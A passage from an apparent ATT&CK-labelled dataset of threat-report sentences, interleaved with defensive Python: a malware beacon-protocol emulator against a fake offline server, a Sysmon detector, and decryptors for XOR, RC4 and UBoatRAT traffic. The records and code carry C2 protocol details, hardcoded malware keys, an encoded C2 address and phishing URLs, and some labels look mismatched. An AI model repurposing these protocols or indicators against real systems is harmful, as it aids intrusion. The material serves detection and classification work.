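    """hex(Environment.UserName + '/' + Environment.MachineName).
    Assumed: UTF-8 bytes, lowercase hex."""
    return binascii.hexlify(f"{user}/{machine}".encode()).decode()


def chk_accepted(body, ident):
    """/chk: the C2 echoes the beacon id only when it has work queued."""
    return body.strip().lower() == ident.lower()


def parse_what(body):
    """/what: 'Oops' means the C2 wants the client to exit; otherwise the
    body is '[command]<>[parameters in hex]'. Returns None or (cmd, params)."""
    if "Oops" in body:
        return None
    command, sep, hexparams = body.partition("<>")
    if not sep:
        raise ValueError("malformed /what response: missing '<>' delimiter")
    return command.strip(), binascii.unhexlify(hexparams.strip())


class FakeC2:
    """Constructed stand-in for the server (no network is used).
    Responses are keyed by URL path; every request is recorded."""
    def __init__(self, responses):
        self.responses = responses
        self.requests = []

    def get(self, url):
        self.requests.append(url)
        path = url.rsplit("/", 1)[-1]
        return self.responses.get(path, "")


def run_exchange(c2, domain, user, machine):
    """One beacon cycle. Returns ('idle', None) when /chk is not echoed
    (the real sample drops an empty srvCheckresponded.tmp in
    CommonApplicationData at that point), ('oops', None) on 'Oops', or
    ('task', (command, params)) when a command was issued."""
    ident = beacon_id(user, machine)
    if not chk_accepted(c2.get(f"http://{domain}/chk"), ident):
        return ("idle", None)
    task = parse_what(c2.get(f"http://{domain}/what"))
    return ("oops", None) if task is None else ("task", task)


if __name__ == "__main__":
    ident = beacon_id("alice", "WS01")
    # "cmd" is an assumed command name; params are the hex of b"whoami".
    server = FakeC2({"chk": ident, "what": "cmd<>77686f616d69"})
    print(run_exchange(server, "c2.example", "alice", "WS01"))
```

The useful detection angle here is the URL shape: two consecutive GETs to `/chk` and `/what` on the same host from a browser user-agent, with a response body that is just the hex of `user/machine`, which is cheap to match in proxy logs even though the request itself carries no custom headers.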
|
|
{"text1":"Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts","labels":"['T1562.006', 'T1112']"}
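The CrashDumpEnabled=0 write named above is a concrete, loggable IOC: Sysmon Event ID 13 (RegistryEvent, value set) records the image, the target value and the new data. The following detection logic is an added example, not from the page or from the SentinelOne write-up: it scans constructed JSON-per-line Sysmon records for a DWORD 0 written to ...\Control\CrashControl\CrashDumpEnabled under CurrentControlSet or any ControlSetNNN. The event lines, hostnames and image paths are made up.

```python
"""Flag Sysmon EventID 13 records that set CrashControl\\CrashDumpEnabled to 0.
Added example over constructed events."""
import json
import re

# Constructed Sysmon EventID 13/12 records as a log forwarder might emit them.
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\EnableICMPRedirect", "Details": "DWORD (0x00000001)"}
{"EventID": 13, "Image": "C:\\Users\\Public\\dropper.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled", "Details": "DWORD (0x00000000)"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\SystemSettingsAdminFlows.exe", "TargetObject": "HKLM\\System\\ControlSet001\\Control\\CrashControl\\CrashDumpEnabled", "Details": "DWORD (0x00000007)"}
{"EventID": 12, "Image": "C:\\Users\\Public\\dropper.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\svc_example", "Details": null}
"""

# Match the value under CurrentControlSet or a numbered control set.
CRASHDUMP_RE = re.compile(
    r"\\(CurrentControlSet|ControlSet\d{3})\\Control\\CrashControl\\CrashDumpEnabled$",
    re.IGNORECASE)

DWORD_RE = re.compile(r"DWORD \(0x([0-9a-fA-F]{8})\)")


def dword_value(details):
    """Sysmon renders DWORD data as 'DWORD (0x00000000)'; return the int or None."""
    m = DWORD_RE.fullmatch(details or "")
    return int(m.group(1), 16) if m else None


def iter_events(text):
    """Yield parsed records, skipping blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def detect_crashdump_disable(text):
    """Return (Image, TargetObject) for every value-set event that writes 0 to
    CrashDumpEnabled. Other DWORD values (1, 2, 3, 7) are normal dump modes."""
    hits = []
    for ev in iter_events(text):
        if ev.get("EventID") != 13:
            continue
        if not CRASHDUMP_RE.search(ev.get("TargetObject", "")):
            continue
        if dword_value(ev.get("Details")) == 0:
            hits.append((ev["Image"], ev["TargetObject"]))
    return hits


if __name__ == "__main__":
    for image, target in detect_crashdump_disable(SAMPLE_EVENTS):
        print(f"crash dumps disabled by {image}: {target}")
```

Disabling crash dumps is something an administrator can also do legitimately through system settings, so triage on the writing image (a signed settings host versus an unsigned binary in a user-writable path) and on what the same process does next, such as creating a driver file and a service.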
|
|
{"text1":"APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals","labels":"['T1566.002', 'T1204.001']"}
|
|
{"text1":"These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings","labels":"['T1562.001']"}
|
|
{"text1":"TClient will use SSL to connect to Tropic Trooper\u2019s C&C server. This allows Tropic Trooper\u2019s operators to easily change\/update the C&C server and configure other values","labels":"['T1573.002']"}
|
|
{"text1":"They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command","labels":"['T1560.001']"}
|
|
{"text1":"CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft","labels":"['T1195.002']"}
|
|
{"text1":"A format string that defaults to \u201cpublic\/Publics\u201d that modifies characteristics of the folder and hide it from the infected user","labels":"['T1564.001']"}
|
|
{"text1":"Each targeted file is opened, read, encrypted in memory, and then written to a new file in the malware\u2019s working directory using the filename format <random number>.WNCRYT. The files are then renamed to their original filename followed by the .WINCRY extension and moved to their original directory. The taskdl.exe process launched by the malware periodically deletes the remaining WINCRYT temporary files. The encryption process does not directly overwrite file data, so forensic recovery of file contents may be possible depending on the environment. The entire contents of the file are encrypted and saved with a custom header (see Figure 7","labels":"['T1489']"}
|
|
{"text1":"As you can see in Figure 1, the authentication prompt says \u201cConnecting to <redacted>. 0utl00k[.]net\u201d, which is a DarkHydrus C2 server. If the user enters their credentials in this dialog box and presses \u2018Ok\u2019, the credentials are sent to the C2 server via the URL https:\/\/<redacted>.0utl00k[.]net\/download\/template.docx. With the authentication dialog box gone, Word displays the contents of the document, which in this specific case was an empty document. While this document was empty, the authentication prompt\u00a0may have made the targeted user more likely\u00a0to enter their credentials, thinking it\u2019s necessary to view the contents of the document. DarkHydrus also created their C2 domain carefully in an attempt to further trick the targeted user to enter their credentials. Also, the 0utl00k[.]net domain resembles Microsoft\u2019s legitimate \"outlook.com\u201d domain that provides free email services, which also make the user less suspicious and more likely to enter their credentials. Some users may not even notice what domain the dialog states they are connecting to and habitually type their Windows credentials. We found two additional Word documents using the 0utl00k[.]net domain to harvest credentials, seen in Table 1. We first saw these related Word documents in September and November 2017, which suggests that DarkHydrus has been carrying out this credential harvesting campaign for almost a year","labels":"['T1187']"}
|
|
{"text1":"The dropper installs the Bisonal EXE file and decoy PDF file. These files are not encrypted and the offset to the EXE and PDF file in the dropper is appended at the end of the dropper file. The file name of the decoy file is based on the dropper file name. The dropper code creates a PDF at the same directory, give the same name with itself to the decoy file, removes .exe and adds .pdf in the code. The dropper also creates two VBS scripts in the %Temp% directory with a random 4 digits hexadecimal name. The other deletes the dropper and the VBS script itself","labels":"['T1070.004']"}
|
|
{"text1":"Next, BoomBox AES-encrypts the host information string above using the hardcoded encryption key \u201c123do3y4r378o5t34onf7t3o573tfo73\u201d and initialization vector (IV) value \u201c1233t04p7jn3n4rg\u201d. To masquerade the data as contents of a PDF file, BoomBox prepends and appends the magic markers for PDF to the AES-encrypted host information string above","labels":"['T1036', 'T1027']"}
|
|
{"text1":"For example, Monash University, located in Australia, has been a popular Silent Librarian target. Like the overall content of their lures, the subject lines of Silent Librarian phishing emails have remained consistent over time. Phishing Pages . We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP. Legitimate American\u00a0University Library Login URL (above) . Silent Librarian Phishing URL (January 2018) . The content of Silent Librarian phishing pages is almost identical to the legitimate target sites. The actors likely scrape the original HTML source code from the legitimate library login page, then edit the references to resources used to render the webpage (images, JavaScript, CSS, etc. An analysis of the Silent Librarian kits identified two email accounts that were used to receive compromised victim credentials. Similarly, the credentials stolen in the Silent Librarian phishing attacks we identified were sold on an Iranian website; however, it is not one of the sites specified in the indictment. Using a combination of technical and open source research, we identified another website, Uniaccount[.]ir, that was used to sell the credentials compromised in the Silent Librarian phishing attacks","labels":"['T1598.003']"}
|
|
{"text1":"An already public UAC bypass method is included in the binary. It doesn\u2019t matter if the method will work or not since the process will exit. This is one more indication that the tool is still in development and there are plans to expand its capabilities","labels":"['T1548.002']"}
|
|
{"text1":"Upon execution, HyperStack undergoes a similar registry key check to Turla\u2019s RPC backdoor and updates the same registry key to determine which named pipes can be accessed anonymously. The HyperStack backdoor first copies itself to C:\\ADSchemeIntegrity.exe and then installs itself with system-level privileges as the service Active Directory Scheme Integrity Service. HyperStack checks for the following registry entry and, when found, adds the name of its communication pipe (\u2018adschemerpc\u2019) to the key value","labels":"['T1112']"}
|
|
{"text1":"The adversaries installed the backdoor as a service on the infected machine. They attempted to operate under the radar by naming the service \"Windows Time Service\", like the existing Windows service","labels":"['T1036.004']"}
|
|
{"text1":"The use of an initial reconnaissance document allows Inception to profile the target\u2019s computer and potentially customize any subsequent malicious document to exploit known vulnerabilities in unpatched software on the computer","labels":"['T1566.001']"}
|
|
{"text1":"The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already discontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an encrypted configuration file","labels":"['T1055.001']"}
|
|
{"text1":"Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence","labels":"['T1553.002']"}
|
|
{"text1":"After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured","labels":"['T1560.002']"}
|
|
{"text1":"As with every communication with the C2, the script collects and sends information about the target environment including the stack of security solutions installed on the computer and are part of the following list","labels":"['T1518.001']"}
|
|
{"text1":"FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. Mandiant identified a utility script named kill.bat that was run on systems in the environment. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc. Domain administrators have complete control over Windows systems in an Active Directory environment","labels":"['T1036.004']"}
|
|
{"text1":"The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult","labels":"['T1027.002']"}
|
|
{"text1":"Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as","labels":"['T1571']"}
|
|
{"text1":"Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task\/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundll32 [T1218.011]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task\/Job: Cron [T1053.003], Scheduled Task\/Job: Launchd [T1053.004","labels":"['T1106', 'T1059.005', 'T1059.001', 'T1053.003', 'T1218.011']"}
|
|
{"text1":"To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value\u2019s MD5 hash as an initial vector. Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in Farsi","labels":"['T1140']"}
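The record above describes two separate primitives: repeating-key XOR with a 25-character per-sample key for the configuration, and RC4 through the Win32 CryptoAPI keyed from the MD5 of a supplied value. The following is an added example, not the malware's code or anything from the page: it implements both so an analyst can decrypt a recovered blob offline. One caveat is worth stating plainly: RC4 has no initialisation vector, so the report's "initial vector" can only be key material; this example assumes the 16-byte MD5 digest is used directly as the RC4 key, which is what CryptDeriveKey yields for a 128-bit RC4 key from an MD5 hash, but that mapping is an assumption here. The sample configuration and file contents are constructed.

```python
"""XOR config decryption and MD5-keyed RC4 file decryption. Added example;
the MD5-as-RC4-key mapping is an assumption, sample data is constructed."""
import hashlib


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) then keystream XOR (PRGA)."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_key_from_value(value: str) -> bytes:
    """Assumed derivation: the 16-byte MD5 digest of the supplied value is the
    RC4 key (RC4 has no IV, whatever the report calls it)."""
    return hashlib.md5(value.encode()).digest()


def decrypt_config(blob: bytes, key: str) -> bytes:
    """Configuration path: XOR with the sample's 25-character key."""
    return xor_with_key(blob, key.encode())


def decrypt_file(blob: bytes, value: str) -> bytes:
    """File path: RC4 keyed by MD5(value)."""
    return rc4(rc4_key_from_value(value), blob)


if __name__ == "__main__":
    # Constructed demo: the key string is the one quoted in the report.
    key = "waEHleblxiQjoxFJQaIMLdHKz"
    cfg = b'{"c2":"example.invalid","port":443}'
    enc = xor_with_key(cfg, key.encode())
    print(decrypt_config(enc, key))
    ct = rc4(rc4_key_from_value("salamati"), b"file contents")
    print(decrypt_file(ct, "salamati"))
```

When the key string is unknown, the 25-byte period is itself a handle: the XOR of a suspected plaintext fragment (a URL scheme, a null-padded field) with the ciphertext at the same offset yields key bytes, and the period lets them be placed modulo 25.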
|
|
{"text1":"Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format","labels":"['T1059.003']"}
|
|
{"text1":"https:\/\/raw.githubusercontent[.]com\/r1ng\/news\/master\/README.md The malware accesses the URL and decodes the characters between the string \u201c[Rudeltaktik]\u201d and character \u201c!\u201d using BASE64. Rudeltaktik]MTE1LjY4LjQ5LjE3OTo4MA==! UBoatRAT uses a custom command and control protocol to communicate with the attacker\u2019s server. The malware places the string '488' (0x34, 0x38, 0x38 in HEX) at the top of the payload or instruction and encrypts the entire buffer with the static key 0x88 by using simple XOR cipher. Then the network payload always starts with 0xBC, 0xB0, 0xB0","labels":"['T1027']"}
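Two things in the UBoatRAT record above are concrete enough to implement and check: recovering the C2 address from the README by base64-decoding whatever sits between "[Rudeltaktik]" and "!", and the framing of the custom protocol (a "488" prefix, then XOR of the whole buffer with 0x88, which is why every frame starts BC B0 B0). The following is an added example, not code from the page or from Unit 42: it decodes the dead-drop marker from a constructed README snippet that embeds the exact base64 quoted above, builds and parses frames, and exposes the three-byte check a network sensor would apply. The README text around the marker is made up.

```python
"""UBoatRAT dead-drop decoding and frame (de)obfuscation. Added example;
README wrapper text is constructed, the base64 is the one quoted above."""
import base64
import re

MARKER_RE = re.compile(r"\[Rudeltaktik\](.*?)!", re.S)

KEY = 0x88
HEADER = b"488"                      # 0x34 0x38 0x38 before XOR
FRAME_PREFIX = bytes(b ^ KEY for b in HEADER)   # b"\xbc\xb0\xb0" on the wire


def extract_c2(readme_text):
    """Base64 between '[Rudeltaktik]' and '!' decodes to 'host:port'."""
    m = MARKER_RE.search(readme_text)
    if not m:
        return None
    return base64.b64decode(m.group(1).strip()).decode()


def encode_frame(payload: bytes) -> bytes:
    """Client side: prepend '488', then XOR every byte with 0x88."""
    return bytes(b ^ KEY for b in HEADER + payload)


def decode_frame(frame: bytes) -> bytes:
    """Reverse the obfuscation and strip the header; refuse anything else."""
    plain = bytes(b ^ KEY for b in frame)
    if not plain.startswith(HEADER):
        raise ValueError("not a UBoatRAT frame: header mismatch")
    return plain[len(HEADER):]


def looks_like_uboatrat(frame: bytes) -> bool:
    """Sensor-side check: the obfuscated frame always begins BC B0 B0."""
    return frame[:3] == FRAME_PREFIX


# Constructed README around the marker quoted in the report.
SAMPLE_README = "# news\nnothing to see here\n[Rudeltaktik]MTE1LjY4LjQ5LjE3OTo4MA==!\n"

if __name__ == "__main__":
    print(extract_c2(SAMPLE_README))
    frame = encode_frame(b"ping")
    print(frame.hex(), looks_like_uboatrat(frame), decode_frame(frame))
```

A single-byte XOR with a fixed prefix is a gift to detection: the first three bytes of every session are constant, and XOR-ing any captured frame with 0x88 reveals the command text directly, so a content match on `|bc b0 b0|` at the start of the TCP payload is a reasonable first-pass signature.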
|
|
{"text1":"ALL tim nha Chi Ngoc Canada: The shell script containing the main malicious routines - configureDefault.def: The word file displayed during execution","labels":"['T1059.004']"}
|
|
{"text1":"shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. Modules used for spreading inside a local network of compromised machines via SMB. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit","labels":"['T1135']"}
|
|
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1059.001']"}
|
|
{"text1":"This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched","labels":"['T1543.003']"}
|
|
{"text1":"The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer","labels":"['T1074.001']"}
|
|
{"text1":"The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include","labels":"['T1047', 'T1497.001', 'T1057']"}
|
|
{"text1":"The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance","labels":"['T1036.005']"}
|
|
{"text1":"The malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines","labels":"['T1106']"}
|
|
{"text1":"After defining several variables, some of which contain ActiveX objects for file execution and manipulation later, the script uses a function to \u201croll\u201d a random number","labels":"['T1218.001']"}
|
|
{"text1":"A macro is executed by the Office document: The macro inflates and creates a ZIP file on the targeted system and executes a Lua script in this archive. The archive contains the Lua payload and luajit, a Lua interpreter for Windows. Here is the script: This script downloads and executes an additional payload","labels":"['T1059']"}
|
|
{"text1":"In some previous phishing email campaigns,\u00a0attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences","labels":"['T1204.001']"}
|
|
{"text1":"Open malspam with password-protected ZIP attachment. On June 30 and July 1, 2020, we saw indications there may also have been a link to download a ZIP archive instead of an attachment. Extract Microsoft Word document from the password-protected ZIP archive using a unique password from the message text","labels":"['T1566.001']"}
|
|
{"text1":"This said macro executes a command to download the first stage payload using msiexec.exe, a Microsoft Installer tool that can download and run a Windows Installer file. The first stage payload is an MSI Installer that was created using an EXE to MSI converter","labels":"['T1218.007']"}
|
|
{"text1":"The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload","labels":"['T1027']"}
|
|
{"text1":"Posted on . May 23, 2017 . (May 2, 2022) . by Raphael Mudge . Cobalt Strike 3.8 is now available. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. These commands offer means to spawn a payload, in another desktop session, without remote process injection. As detection of remote process injection becomes more common, it\u2019s important to have other ways to achieve our goals without this offensive technique. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. Go to Help -> Arsenal from a licensed copy of Cobalt Strike to download the Resource Kit. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows. A 21-day Cobalt Strike trial is also available","labels":"['T1059.001']"}
|
|
{"text1":"Looking into the arguments shows that the process plugin comes from the received packet to execute functions such as collecting process information, running a new process, and terminating a running one. The process information collected includes the username, user ID, group ID, and process parent ID of the target process","labels":"['T1057', 'T1057']"}
|
|
{"text1":"In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult","labels":"['T1027']"}
|
|
{"text1":"In my opinion enumeration is not an attack technique that blue teamers should focus their defense efforts on. The best way to prevent unauthorized users from accessing this information is by having strict conditional access policies which govern how and from where users are allowed to use their Azure AD credentials. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here. I haven\u2019t personally looked into bypassing this or if other functionality in Azure breaks if you enable this","labels":"['T1078.004']"}
|
|
{"text1":"The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM","labels":"['T1571']"}
|
|
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot","labels":"['T1105']"}
|
|
{"text1":"HyperStack sets the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\\Restrict Anonymous value to 0 so anonymous logon users (i.e. null session connections) can list all account names and enumerate all shared resources on a remote share. The implant can then use the WNetAddConnection2 API call to connect to another remote device's IPC$ share. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from","labels":"['T1087.001']"}
|
|
{"text1":"That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence","labels":"['T1070.004']"}
|
|
{"text1":"Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL under svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system","labels":"['T1569.002', 'T1055', 'T1547.001', 'T1070.004', 'T1112']"}
|
|
{"text1":"The response to this request is hidden in the source code of following Flickr lookalike page","labels":"['T1001']"}
|
|
{"text1":"Upon execution, the malware first decrypts its C2 IP address using a xor-incremental encryption and then creates a mutant, using its C2 IP address as the mutant\u2019s name","labels":"['T1140']"}
|
|
{"text1":"The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using a 247-byte key and saves it to \u2018%WINDOWS%\\system32\\hdv_725x.sys\u2019. The wiper then creates a service named \u2018hdv_725x\u2019 for this driver using the following command line command and runs it with \"sc start hdv_725x","labels":"['T1485']"}
|
|
{"text1":"Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting, again attempting to extract all Word documents","labels":"['T1135']"}
|
|
{"text1":"While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions","labels":"['T1106', 'T1027.003']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1080']"}
|
|
{"text1":"When accessing the Pastebin URL, an encrypted blob is downloaded that requires a corresponding RSA private key from the configuration file. The configuration file analyzed did not contain the RSA private key and therefore we were unable to decrypt the contents of the Pastebin link. We assess the decrypted blob was likely a task for the Carbon instance","labels":"['T1140']"}
|
|
{"text1":"If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware\/lure, which he will execute afterwards","labels":"['T1204.002', 'T1105']"}
|
|
{"text1":"The newer versions of Valak download two payloads in the first stage. The first payload is Valak\u2019s plugin management component (\u201cpluginhost.exe\u201d), and the second is the second stage JavaScript payload of Valak. In earlier versions, Valak did not include the \u201cpluginhost\u201d payload","labels":"['T1105']"}
|
|
{"text1":"As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component","labels":"['T1566.001']"}
|
|
{"text1":"Unit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat group known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor","labels":"['T1059.003', 'T1059.003']"}
|
|
{"text1":"spwebmember was written in Microsoft .NET and includes hardcoded values for client project names for data extraction","labels":"['T1114.002']"}
|
|
